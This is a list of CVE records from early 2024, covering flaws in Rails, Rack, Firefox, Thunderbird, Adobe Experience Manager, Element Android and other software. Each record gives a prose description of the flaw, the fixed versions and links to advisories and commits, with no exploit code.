CVE    2024    26145    Candidate    Discourse Calendar adds the ability to create a dynamic calendar in the first post of a topic on Discourse. Uninvited users are able to gain access to private events by crafting a request to update their attendance. This problem is resolved in commit dfc4fa15f340189f177a1d1ab2cc94ffed3c1190. As a workaround, one may use post visibility to limit access.    MISC:https://github.com/discourse/discourse-calendar/commit/dfc4fa15f340189f177a1d1ab2cc94ffed3c1190   |   URL:https://github.com/discourse/discourse-calendar/commit/dfc4fa15f340189f177a1d1ab2cc94ffed3c1190   |   MISC:https://github.com/discourse/discourse-calendar/security/advisories/GHSA-4hh7-6m34-p2jp   |   URL:https://github.com/discourse/discourse-calendar/security/advisories/GHSA-4hh7-6m34-p2jp    Assigned (20240214)
CVE    2024    26144    Candidate    Rails is a web-application framework. Starting with version 5.2.0, there is a possible sensitive session information leak in Active Storage. By default, Active Storage sends a Set-Cookie header along with the user's session cookie when serving blobs. It also sets Cache-Control to public. Certain proxies may cache the Set-Cookie, leading to an information leak. The vulnerability is fixed in 7.0.8.1 and 6.1.7.7.    MISC:https://discuss.rubyonrails.org/t/possible-sensitive-session-information-leak-in-active-storage/84945   |   URL:https://discuss.rubyonrails.org/t/possible-sensitive-session-information-leak-in-active-storage/84945   |   MISC:https://github.com/rails/rails/commit/723f54566023e91060a67b03353e7c03e7436433   |   URL:https://github.com/rails/rails/commit/723f54566023e91060a67b03353e7c03e7436433   |   MISC:https://github.com/rails/rails/commit/78fe149509fac5b05e54187aaaef216fbb5fd0d3   |   URL:https://github.com/rails/rails/commit/78fe149509fac5b05e54187aaaef216fbb5fd0d3   |   MISC:https://github.com/rails/rails/security/advisories/GHSA-8h22-8cf7-hq6g   |   URL:https://github.com/rails/rails/security/advisories/GHSA-8h22-8cf7-hq6g   |   MISC:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activestorage/CVE-2024-26144.yml   |   URL:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activestorage/CVE-2024-26144.yml    Assigned (20240214)
CVE    2024    26143    Candidate    Rails is a web-application framework. There is a possible XSS vulnerability when using the translation helpers in Action Controller. Applications using translation methods like translate, or t on a controller, with a key ending in "_html", a :default key which contains untrusted user input, and the resulting string is used in a view, may be susceptible to an XSS vulnerability. The vulnerability is fixed in 7.1.3.1 and 7.0.8.1.    MISC:https://discuss.rubyonrails.org/t/possible-xss-vulnerability-in-action-controller/84947   |   URL:https://discuss.rubyonrails.org/t/possible-xss-vulnerability-in-action-controller/84947   |   MISC:https://github.com/rails/rails/commit/4c83b331092a79d58e4adffe4be5f250fa5782cc   |   URL:https://github.com/rails/rails/commit/4c83b331092a79d58e4adffe4be5f250fa5782cc   |   MISC:https://github.com/rails/rails/commit/5187a9ef51980ad1b8e81945ebe0462d28f84f9e   |   URL:https://github.com/rails/rails/commit/5187a9ef51980ad1b8e81945ebe0462d28f84f9e   |   MISC:https://github.com/rails/rails/security/advisories/GHSA-9822-6m93-xqf4   |   URL:https://github.com/rails/rails/security/advisories/GHSA-9822-6m93-xqf4   |   MISC:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2024-26143.yml   |   URL:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2024-26143.yml    Assigned (20240214)
CVE    2024    26142    Candidate    Rails is a web-application framework. Starting in version 7.1.0, there is a possible ReDoS vulnerability in the Accept header parsing routines of Action Dispatch. This vulnerability is patched in 7.1.3.1. Ruby 3.2 has mitigations for this problem, so Rails applications using Ruby 3.2 or newer are unaffected.    MISC:https://discuss.rubyonrails.org/t/possible-redos-vulnerability-in-accept-header-parsing-in-action-dispatch/84946   |   URL:https://discuss.rubyonrails.org/t/possible-redos-vulnerability-in-accept-header-parsing-in-action-dispatch/84946   |   MISC:https://github.com/rails/rails/commit/b4d3bfb5ed8a5b5a90aad3a3b28860c7a931e272   |   URL:https://github.com/rails/rails/commit/b4d3bfb5ed8a5b5a90aad3a3b28860c7a931e272   |   MISC:https://github.com/rails/rails/security/advisories/GHSA-jjhx-jhvp-74wq   |   URL:https://github.com/rails/rails/security/advisories/GHSA-jjhx-jhvp-74wq   |   MISC:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2024-26142.yml   |   URL:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2024-26142.yml    Assigned (20240214)
CVE    2024    26141    Candidate    Rack is a modular Ruby web server interface. Carefully crafted Range headers can cause a server to respond with an unexpectedly large response. Responding with such large responses could lead to a denial of service issue. Vulnerable applications will use the `Rack::File` middleware or the `Rack::Utils.byte_ranges` methods (this includes Rails applications). The vulnerability is fixed in 3.0.9.1 and 2.2.8.1.    MISC:https://discuss.rubyonrails.org/t/possible-dos-vulnerability-with-range-header-in-rack/84944   |   URL:https://discuss.rubyonrails.org/t/possible-dos-vulnerability-with-range-header-in-rack/84944   |   MISC:https://github.com/rack/rack/commit/4849132bef471adb21131980df745f4bb84de2d9   |   URL:https://github.com/rack/rack/commit/4849132bef471adb21131980df745f4bb84de2d9   |   MISC:https://github.com/rack/rack/commit/62457686b26d33a15a254c7768c2076e8e02b48b   |   URL:https://github.com/rack/rack/commit/62457686b26d33a15a254c7768c2076e8e02b48b   |   MISC:https://github.com/rack/rack/security/advisories/GHSA-xj5v-6v4g-jfw6   |   URL:https://github.com/rack/rack/security/advisories/GHSA-xj5v-6v4g-jfw6   |   MISC:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2024-26141.yml   |   URL:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2024-26141.yml    Assigned (20240214)
CVE    2024    26140    Candidate    com.yetanalytics/lrs is the Yet Analytics Core LRS Library. Prior to version 1.2.17 of the LRS library and version 0.7.5 of SQL LRS, a maliciously crafted xAPI statement could be used to perform script or other tag injection in the LRS Statement Browser. The problem is patched in version 1.2.17 of the LRS library and version 0.7.5 of SQL LRS. No known workarounds exist.    MISC:https://clojars.org/com.yetanalytics/lrs/versions/1.2.17   |   URL:https://clojars.org/com.yetanalytics/lrs/versions/1.2.17   |   MISC:https://github.com/yetanalytics/lrs/commit/d7f4883bc2252337d25e8bba2c7f9d172f5b0621   |   URL:https://github.com/yetanalytics/lrs/commit/d7f4883bc2252337d25e8bba2c7f9d172f5b0621   |   MISC:https://github.com/yetanalytics/lrs/releases/tag/v1.2.17   |   URL:https://github.com/yetanalytics/lrs/releases/tag/v1.2.17   |   MISC:https://github.com/yetanalytics/lrs/security/advisories/GHSA-7rw2-3hhp-rc46   |   URL:https://github.com/yetanalytics/lrs/security/advisories/GHSA-7rw2-3hhp-rc46   |   MISC:https://github.com/yetanalytics/lrsql/releases/tag/v0.7.5   |   URL:https://github.com/yetanalytics/lrsql/releases/tag/v0.7.5    Assigned (20240214)
CVE    2024    2614    Candidate    Memory safety bugs present in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9.    MISC:Memory safety bugs fixed in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9   |   URL:https://bugzilla.mozilla.org/buglist.cgi?bug_id=1685358%2C1861016%2C1880405%2C1881093   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html   |   MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html    Assigned (20240318)
CVE    2024    26138    Candidate    The XWiki licensor application, which manages and enforces application licenses for paid extensions, includes the document `Licenses.Code.LicenseJSON` that provides information for admins regarding active licenses. This document is public and thus exposes this information publicly. The information includes the instance's id as well as first and last name and email of the license owner. This is a leak of information that isn't supposed to be public. The instance id allows associating data on the active installs data with the concrete XWiki instance. Active installs assures that "there's no way to find who's having a given UUID" (referring to the instance id). Further, the information who the license owner is and information about the obtained licenses can be used for targeted phishing attacks. Also, while user information is normally public, email addresses might only be displayed obfuscated, depending on the configuration. This has been fixed in Application Licensing 1.24.2. There are no known workarounds besides upgrading.    MISC:https://extensions.xwiki.org/xwiki/bin/view/Extension/Active%20Installs%202%20API   |   URL:https://extensions.xwiki.org/xwiki/bin/view/Extension/Active%20Installs%202%20API   |   MISC:https://github.com/xwikisas/application-licensing/commit/d168fb88fc0d121bf95e769ea21c55c00bebe5a6   |   URL:https://github.com/xwikisas/application-licensing/commit/d168fb88fc0d121bf95e769ea21c55c00bebe5a6   |   MISC:https://github.com/xwikisas/application-licensing/security/advisories/GHSA-4hfp-m9gv-m753   |   URL:https://github.com/xwikisas/application-licensing/security/advisories/GHSA-4hfp-m9gv-m753    Assigned (20240214)
CVE    2024    26136    Candidate    kedi ElectronCord is a bot management tool for Discord. Commit aaaeaf4e6c99893827b2eea4dd02f755e1e24041 exposes an account access token in the `config.json` file. Malicious actors could potentially exploit this vulnerability to gain unauthorized access to sensitive information or perform malicious actions on behalf of the repository owner. As of time of publication, it is unknown whether the owner of the repository has rotated the token or taken other mitigation steps aside from informing users of the situation.    MISC:https://github.com/kedi/ElectronCord/commit/aaaeaf4e6c99893827b2eea4dd02f755e1e24041   |   URL:https://github.com/kedi/ElectronCord/commit/aaaeaf4e6c99893827b2eea4dd02f755e1e24041   |   MISC:https://github.com/kedi/ElectronCord/security/advisories/GHSA-ppwc-5vwp-mhw8   |   URL:https://github.com/kedi/ElectronCord/security/advisories/GHSA-ppwc-5vwp-mhw8    Assigned (20240214)
CVE    2024    26135    Candidate    MeshCentral is a full computer management web site. Versions prior to 1.1.21 contain a cross-site websocket hijacking (CSWSH) vulnerability within the control.ashx endpoint. This component is the primary mechanism used within MeshCentral to perform administrative actions on the server. The vulnerability is exploitable when an attacker is able to convince a victim end-user to click on a malicious link to a page hosting an attacker-controlled site. The attacker can then originate a cross-site websocket connection using client-side JavaScript code to connect to `control.ashx` as the victim user within MeshCentral. Version 1.1.21 contains a patch for this issue.    MISC:https://github.com/Ylianst/MeshCentral/commit/f2e43cc6da9f5447dbff0948e6c6024c8a315af3   |   URL:https://github.com/Ylianst/MeshCentral/commit/f2e43cc6da9f5447dbff0948e6c6024c8a315af3   |   MISC:https://github.com/Ylianst/MeshCentral/security/advisories/GHSA-cp68-qrhr-g9h8   |   URL:https://github.com/Ylianst/MeshCentral/security/advisories/GHSA-cp68-qrhr-g9h8    Assigned (20240214)
CVE    2024    26134    Candidate    cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue.    MISC:https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542   |   URL:https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542   |   MISC:https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df   |   URL:https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df   |   MISC:https://github.com/agronholm/cbor2/pull/204   |   URL:https://github.com/agronholm/cbor2/pull/204   |   MISC:https://github.com/agronholm/cbor2/releases/tag/5.6.2   |   URL:https://github.com/agronholm/cbor2/releases/tag/5.6.2   |   MISC:https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m   |   URL:https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m    Assigned (20240214)
CVE    2024    26133    Candidate    EventStoreDB (ESDB) is an operational database built to store events. A vulnerability has been identified in the projections subsystem in versions 20 prior to 20.10.6, 21 prior to 21.10.11, 22 prior to 22.10.5, and 23 prior to 23.10.1. Only database instances that use custom projections are affected by this vulnerability. User passwords may become accessible to those who have access to the chunk files on disk, and users who have read access to system streams. Only users in the `$admins` group can access system streams by default. ESDB 23.10.1, 22.10.5, 21.10.11, and 20.10.6 contain a patch for this issue. Users should upgrade EventStoreDB, reset the passwords for current and previous members of `$admins` and `$ops` groups, and, if a password was reused in any other system, reset it in those systems to a unique password to follow best practices. If an upgrade cannot be done immediately, reset the passwords for current and previous members of `$admins` and `$ops` groups. Avoid creating custom projections until the patch has been applied.    MISC:https://developers.eventstore.com/cloud/ops/#upgrading-eventstoredb-version   |   URL:https://developers.eventstore.com/cloud/ops/#upgrading-eventstoredb-version   |   MISC:https://developers.eventstore.com/server/v22.10/upgrade-guide.html#upgrade-guide-for-eventstoredb-22-10   |   URL:https://developers.eventstore.com/server/v22.10/upgrade-guide.html#upgrade-guide-for-eventstoredb-22-10   |   MISC:https://github.com/EventStore/EventStore/commit/6d4edee18c7fe886abffe58fa1f97d72681b24bf   |   URL:https://github.com/EventStore/EventStore/commit/6d4edee18c7fe886abffe58fa1f97d72681b24bf   |   MISC:https://github.com/EventStore/EventStore/security/advisories/GHSA-6r53-v8hj-x684   |   URL:https://github.com/EventStore/EventStore/security/advisories/GHSA-6r53-v8hj-x684   |   MISC:https://www.eventstore.com/blog/eventstoredb-security-release-23.10-22.10-21.10-and-20.10-for-cve-2024-26133   |   URL:https://www.eventstore.com/blog/eventstoredb-security-release-23.10-22.10-21.10-and-20.10-for-cve-2024-26133   |   MISC:https://www.eventstore.com/blog/new-version-strategy   |   URL:https://www.eventstore.com/blog/new-version-strategy    Assigned (20240214)
CVE    2024    26132    Candidate    Element Android is an Android Matrix Client. A third-party malicious application installed on the same phone can force Element Android, version 0.91.0 through 1.6.12, to share files stored under the `files` directory in the application's private data directory to an arbitrary room. The impact of the attack is reduced by the fact that the databases stored in this folder are encrypted. However, it contains some other potentially sensitive information, such as the FCM token. Forks of Element Android which have set `android:exported="false"` in the `AndroidManifest.xml` file for the `IncomingShareActivity` activity are not impacted. This issue is fixed in Element Android 1.6.12. There is no known workaround to mitigate the issue.    MISC:https://element.io/blog/security-release-element-android-1-6-12   |   URL:https://element.io/blog/security-release-element-android-1-6-12   |   MISC:https://github.com/element-hq/element-android/commit/8f9695a9a8d944cb9b92568cbd76578c51d32e07   |   URL:https://github.com/element-hq/element-android/commit/8f9695a9a8d944cb9b92568cbd76578c51d32e07   |   MISC:https://github.com/element-hq/element-android/security/advisories/GHSA-8wj9-cx7h-pvm4   |   URL:https://github.com/element-hq/element-android/security/advisories/GHSA-8wj9-cx7h-pvm4    Assigned (20240214)
CVE    2024    26131    Candidate    Element Android is an Android Matrix Client. Element Android version 1.4.3 through 1.6.10 is vulnerable to intent redirection, allowing a third-party malicious application to start any internal activity by passing some extra parameters. Possible impact includes making Element Android display an arbitrary web page, executing arbitrary JavaScript; bypassing PIN code protection; and account takeover by spawning a login screen to send credentials to an arbitrary home server. This issue is fixed in Element Android 1.6.12. There is no known workaround to mitigate the issue.    MISC:https://element.io/blog/security-release-element-android-1-6-12   |   URL:https://element.io/blog/security-release-element-android-1-6-12   |   MISC:https://github.com/element-hq/element-android/commit/53734255ec270b0814946350787393dfcaa2a5a9   |   URL:https://github.com/element-hq/element-android/commit/53734255ec270b0814946350787393dfcaa2a5a9   |   MISC:https://github.com/element-hq/element-android/security/advisories/GHSA-j6pr-fpc8-q9vm   |   URL:https://github.com/element-hq/element-android/security/advisories/GHSA-j6pr-fpc8-q9vm   |   MISC:https://support.google.com/faqs/answer/9267555?hl=en   |   URL:https://support.google.com/faqs/answer/9267555?hl=en    Assigned (20240214)
CVE    2024    26130    Candidate    cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Starting in version 38.0.0 and prior to version 42.0.4, if `pkcs12.serialize_key_and_certificates` is called with both a certificate whose public key did not match the provided private key and an `encryption_algorithm` with `hmac_hash` set (via `PrivateFormat.PKCS12.encryption_builder().hmac_hash(...)`), then a NULL pointer dereference would occur, crashing the Python process. This has been resolved in version 42.0.4, the first version in which a `ValueError` is properly raised.    MISC:https://github.com/pyca/cryptography/commit/97d231672763cdb5959a3b191e692a362f1b9e55   |   URL:https://github.com/pyca/cryptography/commit/97d231672763cdb5959a3b191e692a362f1b9e55   |   MISC:https://github.com/pyca/cryptography/pull/10423   |   URL:https://github.com/pyca/cryptography/pull/10423   |   MISC:https://github.com/pyca/cryptography/security/advisories/GHSA-6vqw-3v5j-54x4   |   URL:https://github.com/pyca/cryptography/security/advisories/GHSA-6vqw-3v5j-54x4    Assigned (20240214)
CVE    2024    2613    Candidate    Data was not properly sanitized when decoding a QUIC ACK frame; this could have led to unrestricted memory consumption and a crash. This vulnerability affects Firefox < 124.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1875701   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1875701   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-12/    Assigned (20240318)
CVE    2024    26129    Candidate    PrestaShop is an open-source e-commerce platform. Starting in version 8.1.0 and prior to version 8.1.4, PrestaShop is vulnerable to path disclosure in a JavaScript variable. A patch is available in version 8.1.4.    MISC:https://github.com/PrestaShop/PrestaShop/commit/444bd0dea581659918fe2067541b9863cf099dd5   |   URL:https://github.com/PrestaShop/PrestaShop/commit/444bd0dea581659918fe2067541b9863cf099dd5   |   MISC:https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-3366-9287-7qpr   |   URL:https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-3366-9287-7qpr   |   MISC:https://owasp.org/www-community/attacks/Full_Path_Disclosure   |   URL:https://owasp.org/www-community/attacks/Full_Path_Disclosure    Assigned (20240214)
CVE    2024    26128    Candidate    baserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability.    MISC:https://basercms.net/security/JVN_73283159   |   URL:https://basercms.net/security/JVN_73283159   |   MISC:https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c   |   URL:https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c   |   MISC:https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5   |   URL:https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5    Assigned (20240214)
CVE    2024    26125    Candidate    Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.    MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html   |   URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html    Assigned (20240214)
CVE    2024    2612    Candidate    If an attacker could find a way to trigger a particular code path in `SafeRefPtr`, it could have triggered a crash or potentially be leveraged to achieve code execution. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1879444   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1879444   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html   |   MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html    Assigned (20240318)
CVE    2024    26119    Candidate    Adobe Experience Manager versions 6.5.19 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access. Exploitation of this issue does not require user interaction.    MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html   |   URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html    Assigned (20240214)
CVE    2024    26118    Candidate    Adobe Experience Manager versions 6.5.19 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.    MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html   |   URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html    Assigned (20240214)
CVE    2024    2611    Candidate    A missing delay on when pointer lock was used could have allowed a malicious page to trick a user into granting permissions. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1876675   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1876675   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html   |   MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html    Assigned (20240318)
CVE    2024    2610    Candidate    Using a markup injection an attacker could have stolen nonce values. This could have been used to bypass strict content security policies. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1871112   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1871112   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html   |   MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html    Assigned (20240318)
CVE    2024    2609    Candidate    The permission prompt input delay could have expired while the window is not in focus, which made the prompt vulnerable to clickjacking by malicious websites. This vulnerability affects Firefox < 124.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1866100   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1866100   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-12/    Assigned (20240318)
CVE    2024    26080    Candidate    Adobe Experience Manager versions 6.5.19 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable web pages. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable script.    MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html   |   URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html    Assigned (20240214)
CVE    2024    2608    Candidate    `AppendEncodedAttributeValue(), ExtraSpaceNeededForAttrEncoding()` and `AppendEncodedCharacters()` could have experienced integer overflows, causing underallocation of an output buffer leading to an out of bounds write. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1880692   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1880692   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html   |   MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html    Assigned (20240318)
CVE    2024    2607    Candidate    Return registers were overwritten which could have allowed an attacker to execute arbitrary code. *Note:* This issue only affected Armv7-A systems. Other operating systems are unaffected. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1879939   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1879939   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html   |   MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html    Assigned (20240318)
CVE    2024    26064    Candidate    Adobe Experience Manager versions 6.5.19 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into a webpage. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable script. This could result in arbitrary code execution in the context of the victim's browser. Exploitation of this issue requires user interaction.    MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html   |   URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html    Assigned (20240214)
CVE    2024    26063    Candidate    Adobe Experience Manager versions 6.5.19 and earlier are affected by an Information Exposure vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to gain unauthorized access to sensitive information, potentially bypassing security measures. Exploitation of this issue does not require user interaction.    MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html   |   URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html    Assigned (20240214)
CVE    2024    2606    Candidate    Passing invalid data could have led to invalid wasm values being created, such as arbitrary integers turning into pointer values. This vulnerability affects Firefox < 124.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1879237   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1879237   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-12/    Assigned (20240318)
CVE    2024    2605    Candidate    An attacker could have leveraged the Windows Error Reporter to run arbitrary code on the system escaping the sandbox. *Note:* This issue only affected Windows operating systems. Other operating systems are unaffected. This vulnerability affects Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1872920   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1872920   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-12/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-13/   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-14/    Assigned (20240318)
CVE    2024    26044    Candidate    Adobe Experience Manager versions 6.5.19 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into a webpage. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable script. This could result in arbitrary code execution in the context of the victim's browser.    MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html   |   URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html    Assigned (20240214)
CVE    2024    26042    Candidate    Adobe Experience Manager versions 6.5.19 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable web pages. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable script. This could result in arbitrary code execution in the context of the victim's browser.    MISC:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html   |   URL:https://helpx.adobe.com/security/products/experience-manager/apsb24-05.html    Assigned (20240214)
